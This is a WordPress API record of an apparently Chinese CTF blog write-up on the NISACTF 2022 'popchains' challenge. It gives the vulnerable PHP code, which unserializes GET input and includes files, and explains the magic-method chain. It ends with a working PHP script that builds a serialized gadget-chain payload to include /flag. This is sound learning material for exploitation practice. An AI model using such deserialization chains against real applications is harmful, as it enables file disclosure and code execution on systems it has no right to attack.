{"id":64,"date":"2024-09-29T21:32:11","date_gmt":"2024-09-29T13:32:11","guid":{"rendered":"http:\/\/www.xtmouse.top\/?p=64"},"modified":"2024-09-29T21:32:11","modified_gmt":"2024-09-29T13:32:11","slug":"pop%e9%93%be%e7%bb%8f%e5%85%b8%e5%ba%94%e7%94%a8","status":"publish","type":"post","link":"http:\/\/www.xtmouse.top\/index.php\/2024\/09\/29\/pop%e9%93%be%e7%bb%8f%e5%85%b8%e5%ba%94%e7%94%a8\/","title":{"rendered":"POP\u94fe\u7ecf\u5178\u5e94\u7528"},"content":{"rendered":"\n

[NISACTF 2022]popchains<\/h2>\n\n\n\n

\u9898\u76ee\u5982\u4e0b\uff1a<\/p>\n\n\n\n

<?php\n\necho 'Happy New Year~ MAKE A WISH<br>';\n\nif(isset($_GET['wish'])){\n    @unserialize($_GET['wish']);\n}\nelse{\n    $a=new Road_is_Long;\n    highlight_file(__FILE__);\n}\n\/***************************pop your 2022*****************************\/\n\nclass Road_is_Long{\n    public $page;\n    public $string;\n    public function __construct($file='index.php'){\n        $this->page = $file;\n    }\n    public function __toString(){\n        return $this->string->page;\n    }\n\n    public function __wakeup(){\n        if(preg_match(\"\/file|ftp|http|https|gopher|dict|\\.\\.\/i\", $this->page)) {\n            echo \"You can Not Enter 2022\";\n            $this->page = \"index.php\";\n        }\n    }\n}\n\nclass Try_Work_Hard{\n    protected  $var;\n    public function append($value){\n        include($value);\n    }\n    public function __invoke(){\n        $this->append($this->var);\n    }\n}\n\nclass Make_a_Change{\n    public $effort;\n    public function __construct(){\n        $this->effort = array();\n    }\n\n    public function __get($key){\n        $function = $this->effort;\n        return $function();\n    }\n}\n\/**********************Try to See flag.php*****************************\/ <\/code><\/pre>\n\n\n\n
\u601d\u8def\uff1a<\/p>\n\n\n\n
\u5148\u5f97\u627e\u5230\u6f0f\u6d1e\u70b9\uff0c<\/p>\n\n\n\n
1.\u53ef\u4ee5\u53d1\u73b0append\u51fd\u6570\u6709\u6587\u4ef6\u6267\u884c\u6f0f\u6d1e\uff0c<\/p>\n\n\n\n
2.\u6267\u884cappend\u51fd\u6570\u9700\u8981\u89e6\u53d1__invoke\uff0c\u9700\u8981\u5bf9\u8c61\u88ab\u5f53\u4f5c\u51fd\u6570\u8c03\u7528\uff0c<\/p>\n\n\n\n
3.Try_Work_Hard\u88ab\u5f53\u4f5c\u51fd\u6570\u8c03\u7528\u9700\u8981\u89e6\u53d1Make_a_Change\u4e2d\u7684__get\uff0c<\/p>\n\n\n\n
4.\u89e6\u53d1__get\u9700\u8981Road_is_Long\u4e2d\u8c03\u7528__tostring\uff0c<\/p>\n\n\n\n
5.\u8c03\u7528__tostring\u9700\u8981\u89e6\u53d1wakeup\u4e2d\u7684\u6b63\u5219\u5339\u914d\uff0c\u5e76\u4e14$this->page\u9700\u8981\u662fRoad_is_long\u7c7b<\/p>\n\n\n\n
<?php\n\/***************************pop your 2022*****************************\/\n\nclass Road_is_Long{\n    public $page;\n    public $string;\n}\n\nclass Try_Work_Hard{\n    protected  $var=\"\/flag\";\n    public function append($value){\n        include($value);\n    }\n    public function __invoke(){\n        $this->append($this->var);\n    }\n}\n\nclass Make_a_Change{\n    public $effort;\n\n}\n$a=new Road_is_Long();\n$a->page=$a;\n$a->string=new Make_a_Change();\n$a->string->effort=new Try_Work_Hard();\necho urlencode(serialize($a));<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
[NISACTF 2022]popchains \u9898\u76ee\u5982\u4e0b\uff1a \u601d\u8def\uff1a \u5148\u5f97\u627e\u5230\u6f0f\u6d1e\u70b9\uff0c 1.\u53ef\u4ee5\u53d1\u73b0append\u51fd\u6570\u6709\u6587\u4ef6\u6267\u884c\u6f0f\u6d1e\uff0c …<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-64","post","type-post","status-publish","format-standard","hentry","category-ctf"],"_links":{"self":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/64","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/comments?post=64"}],"version-history":[{"count":1,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/64\/revisions"}],"predecessor-version":[{"id":65,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/64\/revisions\/65"}],"wp:attachment":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/media?parent=64"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/categories?post=64"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/tags?post=64"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}